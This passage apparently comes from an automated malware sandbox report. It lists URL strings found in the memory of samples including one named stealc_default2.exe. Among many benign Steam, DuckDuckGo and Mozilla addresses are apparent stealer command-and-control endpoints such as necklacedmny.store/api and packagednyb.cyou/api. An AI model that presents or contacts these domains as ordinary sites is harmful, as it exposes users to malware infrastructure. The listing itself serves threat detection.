Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=paSZSuZLtnMg&amp
Source: new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwNL
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=engl
Source: new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=
Source: new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/s
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Ff_1prscqzeu&
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
Source: new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflarekL
Source: stealc_default2.exe, 00000007.00000002.3140672714.0000000027170000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000007.00000002.3112251700.0000000000AD1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3047409910.0000000000CEA000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3758849726.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3783337411.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.4145121508.0000000000D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: stealc_default2.exe, 00000007.00000002.3140672714.0000000027170000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000007.00000002.3112251700.0000000000AD1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3047409910.0000000000CEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: JavUmar.exe, 0000001F.00000000.2978282515.0000000000583000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: JavUmar.exe, 0000001F.00000000.2978282515.0000000000583000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://curl.se/docs/hsts.html
Source: JavUmar.exe, 0000001F.00000000.2978282515.0000000000583000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: stealc_default2.exe, 00000007.00000003.2833417786.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3009118498.0000000003C4C000.00000004.00000800.00020000.00000000.sdmp, JavUmar.exe, 0000001F.00000003.3650241712.0000000003665000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3414104883.00000000054FC000.00000004.00000800.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3435080893.00000000054F9000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 0000002C.00000003.3525441016.0000000003BCC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: stealc_default2.exe, 00000007.00000003.2833417786.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3009118498.0000000003C4C000.00000004.00000800.00020000.00000000.sdmp, JavUmar.exe, 0000001F.00000003.3650241712.0000000003665000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3414104883.00000000054FC000.00000004.00000800.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3435080893.00000000054F9000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 0000002C.00000003.3525441016.0000000003BCC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: stealc_default2.exe, 00000007.00000003.2833417786.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3009118498.0000000003C4C000.00000004.00000800.00020000.00000000.sdmp, JavUmar.exe, 0000001F.00000003.3650241712.0000000003665000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3414104883.00000000054FC000.00000004.00000800.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3435080893.00000000054F9000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 0000002C.00000003.3525441016.0000000003BCC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 00000022.00000003.2993225021.000001D5C2473000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000022.00000003.2993225021.000001D5C2400000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: GOLD1234.exe, 0000002C.00000002.3684944310.00000000014E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://goalyfeastz.site/8
Source: GOLD1234.exe, 0000002C.00000002.3684944310.00000000014CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://goalyfeastz.site/??
Source: GOLD1234.exe, 0000002C.00000002.3684944310.00000000014E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://goalyfeastz.site/Y
Source: new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: new_v8.exe, 0000001E.00000003.3047409910.0000000000CEA000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3758849726.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3783337411.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.4145121508.0000000000D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: new_v8.exe, 0000001E.00000003.2975549924.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2961250816.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975104545.0000000000C70000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: new_v8.exe, 0000001E.00000003.2975549924.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2961250816.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975104545.0000000000C70000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: 3288f0a855.exe, 00000028.00000002.4508142028.0000000000D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/
Source: 3288f0a855.exe, 00000028.00000003.4298058506.0000000000D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/2
Source: 3288f0a855.exe, 00000028.00000003.4353004958.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000002.4506037697.0000000000D64000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/Mo
Source: 3288f0a855.exe, 00000028.00000003.3625699652.0000000000D72000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000002.4470400010.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.4354418352.0000000000D90000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000002.4519408449.0000000000D90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/api
Source: 3288f0a855.exe, 00000028.00000003.3659374635.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3659725440.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3616953743.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3625699652.0000000000D72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/apiB
Source: 3288f0a855.exe, 00000028.00000003.4178327822.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.4144934066.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/apiE
Source: 3288f0a855.exe, 00000028.00000002.4470400010.0000000000D00000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.4352385064.0000000000D00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/apiL
Source: 3288f0a855.exe, 00000028.00000003.4353004958.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000002.4506037697.0000000000D64000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/apiaJm$
Source: 3288f0a855.exe, 00000028.00000003.4145121508.0000000000D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/b~
Source: 3288f0a855.exe, 00000028.00000003.3658829272.0000000000D6E000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3616953743.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/r
Source: 3288f0a855.exe, 00000028.00000003.3658829272.0000000000D6E000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3489034650.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3489264964.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3584006517.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store:443/api
Source: 3288f0a855.exe, 00000028.00000003.3616953743.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store:443/apiC
Source: new_v8.exe, 0000001E.00000003.3045435699.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3097027296.0000000000CC4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packagednyb.cyou/
Source: new_v8.exe, 0000001E.00000002.3415654770.0000000000C0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packagednyb.cyou/(
Source: new_v8.exe, 0000001E.00000003.3097750570.0000000000CC4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packagednyb.cyou/3
Source: new_v8.exe, 0000001E.00000003.3044486078.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3045770050.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3030309875.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3045435699.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packagednyb.cyou/5
Source: new_v8.exe, 0000001E.00000003.3060297039.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3091069312.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3060630671.0000000000CC4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3097027296.0000000000CC4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packagednyb.cyou/;
Source: new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packagednyb.cyou/U
Source: new_v8.exe, 0000001E.00000003.3097750570.0000000000CC4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3180922524.0000000000CC4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packagednyb.cyou/a
Source: new_v8.exe, 0000001E.00000003.3090999050.0000000000CD3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975104545.0000000000C70000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3030309875.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3108029948.0000000000CD3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3255308396.0000000000CCA000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packagednyb.cyou/api
Source: new_v8.exe, 0000001E.00000003.2975549924.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975104545.0000000000C70000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packagednyb.cyou/api.8
Source: new_v8.exe, 0000001E.00000003.2975549924.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975104545.0000000000C70000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packagednyb.cyou/api=
Source: new_v8.exe, 0000001E.00000003.3030309875.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packagednyb.cyou/apiQ
Source: new_v8.exe, 0000001E.00000002.3446426303.0000000000CD3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3108029948.0000000000CD3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3255308396.0000000000CCA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packagednyb.cyou/apie
Source: new_v8.exe, 0000001E.00000003.3255532935.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000002.3440425475.0000000000CAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packagednyb.cyou/apie:
Source: new_v8.exe, 0000001E.00000003.3255214017.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3107929951.0000000000CD6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packagednyb.cyou/apiesO
Source: new_v8.exe, 0000001E.00000003.2976296155.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975549924.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packagednyb.cyou/apii
Source: new_v8.exe, 0000001E.00000003.3060297039.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packagednyb.cyou/apila
Source: new_v8.exe, 0000001E.00000002.3415654770.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packagednyb.cyou/apim
Source: new_v8.exe, 0000001E.00000003.3030309875.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packagednyb.cyou/apimde
Source: new_v8.exe, 0000001E.00000003.2975549924.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3255214017.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975104545.0000000000C70000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packagednyb.cyou/h
Source: new_v8.exe, 0000001E.00000003.3044486078.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3045770050.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3045435699.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packagednyb.cyou/m
Source: new_v8.exe, 0000001E.00000003.3097750570.0000000000CC4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packagednyb.cyou/p
Source: new_v8.exe, 0000001E.00000002.3415654770.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packagednyb.cyou/r
Source: new_v8.exe, 0000001E.00000003.3060297039.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packagednyb.cyou:443/apiozilla
Source: new_v8.exe, 0000001E.00000003.2975549924.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2961250816.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975104545.0000000000C70000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: new_v8.exe, 0000001E.00000003.2975549924.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2961250816.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975104545.0000000000C70000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: new_v8.exe, 0000001E.00000003.2975549924.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2961250816.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975104545.0000000000C70000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: new_v8.exe, 0000001E.00000003.2975549924.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2961250816.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975104545.0000000000C70000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: axplong.exe, 00000006.00000002.4852244876.0000000001550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: new_v8.exe, 0000001E.00000003.2975549924.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2961250816.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975104545.0000000000C70000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
